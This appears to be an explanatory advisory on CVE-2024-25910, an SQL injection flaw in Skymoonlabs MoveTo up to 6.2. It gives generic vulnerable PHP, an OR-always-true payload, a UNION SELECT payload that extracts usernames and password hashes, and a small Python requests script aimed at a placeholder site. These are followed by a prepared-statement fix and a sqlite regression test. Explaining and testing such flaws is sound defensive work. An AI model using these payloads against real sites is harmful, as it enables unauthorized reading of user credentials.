Summary:
A critical SQL Injection vulnerability (CVE-2024-25910) exists in Skymoonlabs MoveTo from unknown initial versions up through and including version 6.2. This bug lets attackers inject malicious SQL through user-supplied data and read or manipulate the application’s database. This article explains the issue in simple language, shows an example exploit, and links to official references.

What is CVE-2024-25910?

CVE-2024-25910 is titled: “Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)”. It affects Skymoonlabs MoveTo, a popular web-based platform. Versions up to and including 6.2 are vulnerable. An unauthenticated user can use the flaw to send crafted input, bypassing database security and possibly leaking, changing, or deleting sensitive data.

How Does the Vulnerability Work?

The bug exists because the application does not properly escape user-provided input in SQL queries in some procedures or endpoints.

The vulnerable pattern takes user input and places it directly into the text of a SQL query, like this:

// vulnerable PHP pseudo-code
$user_id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id = '$user_id'";
$result = mysqli_query($conn, $sql);

There is no sanitization and no prepared statement, so an attacker can pass this value:

?id=1' OR '1'='1

The query becomes

SELECT * FROM users WHERE id = '1' OR '1'='1'

Because '1'='1' is always true, the WHERE clause matches every row and the query returns every user!

How Could this be Exploited?

Suppose the id parameter is used unsafely, as above, and there is no authentication for this page.

Send a request like

GET /users.php?id=1' OR '1'='1

This might show all user records.

Advanced Exploit Example: Extracting a Password Hash

Change the payload to

?id=' UNION SELECT 1,username,password,NULL FROM users-- -

Modified SQL query

SELECT * FROM users WHERE id = ''
UNION SELECT 1,username,password,NULL FROM users-- -'

If the page shows database output, an attacker now sees usernames and password hashes.

Here's a simple Python script using requests to exploit the issue

import requests

url = "http://target-moveto-site.com/users.php"
payload = "1' OR '1'='1"   # Basic SQL injection

params = {'id': payload}

r = requests.get(url, params=params)
print(r.text)   # The response may include all users

References

- CVE-2024-25910 at NVD
- Skymoonlabs MoveTo Product Page (official vendor site)
- OWASP SQL Injection Explained

How to Fix

Update Immediately:
If you use MoveTo version 6.2 or below, upgrade to the latest release as soon as possible.

Developers Should:
- Use prepared statements / parameterized queries instead of adding variables directly to SQL queries.

Example fix in PHP (using prepared statements)

$user_id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param('i', $user_id);
$stmt->execute();
$result = $stmt->get_result();
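
The difference between the concatenated query and the prepared statement can be checked with a small regression test that feeds both of the article's payloads to each pattern. This is an added example, not code from MoveTo or from the original article; it assumes Python's in-memory sqlite3 as a stand-in for the application's database, and the table layout, rows and function names are constructed for illustration.

```python
import sqlite3

# Payloads quoted in the article above.
PAYLOAD_OR = "1' OR '1'='1"
PAYLOAD_UNION = "' UNION SELECT 1,username,password,NULL FROM users-- -"

def make_db():
    """Constructed sample table; MoveTo's real schema is not shown on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "alice", "hash-a", "a@example.test"),   # constructed rows
        (2, "bob", "hash-b", "b@example.test"),
        (3, "carol", "hash-c", "c@example.test"),
    ])
    return conn

def lookup_concatenated(conn, user_id):
    """Vulnerable pattern: the input becomes part of the SQL text."""
    sql = "SELECT * FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    """Fixed pattern: the input is bound as a value and never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

def regression_report(conn):
    """Row counts per input for both patterns: {input: (concatenated, bound)}."""
    report = {}
    for value in ("1", PAYLOAD_OR, PAYLOAD_UNION):
        report[value] = (len(lookup_concatenated(conn, value)),
                         len(lookup_parameterized(conn, value)))
    return report

if __name__ == "__main__":
    for value, (concat, bound) in regression_report(make_db()).items():
        print(f"{value!r}: concatenated={concat} rows, parameterized={bound} rows")
```

With the bound parameter, a legitimate id still returns its single row, while both payloads are compared as plain strings against the id column and match nothing.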

Conclusion

CVE-2024-25910 is a dangerous SQL Injection bug found in Skymoonlabs MoveTo up to version 6.2. If you run this software, update right away and audit your code for unsafe SQL usage. Always sanitize input and use prepared statements—never trust user data in your SQL!

*Stay safe—always patch, validate, and code securely.*

Timeline

Published on: 02/28/2024 13:15:09 UTC
Last modified on: 02/28/2024 14:06:45 UTC